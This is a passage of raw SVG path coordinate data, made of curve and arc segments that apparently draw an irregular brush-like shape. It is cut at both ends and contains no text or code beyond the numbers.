2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1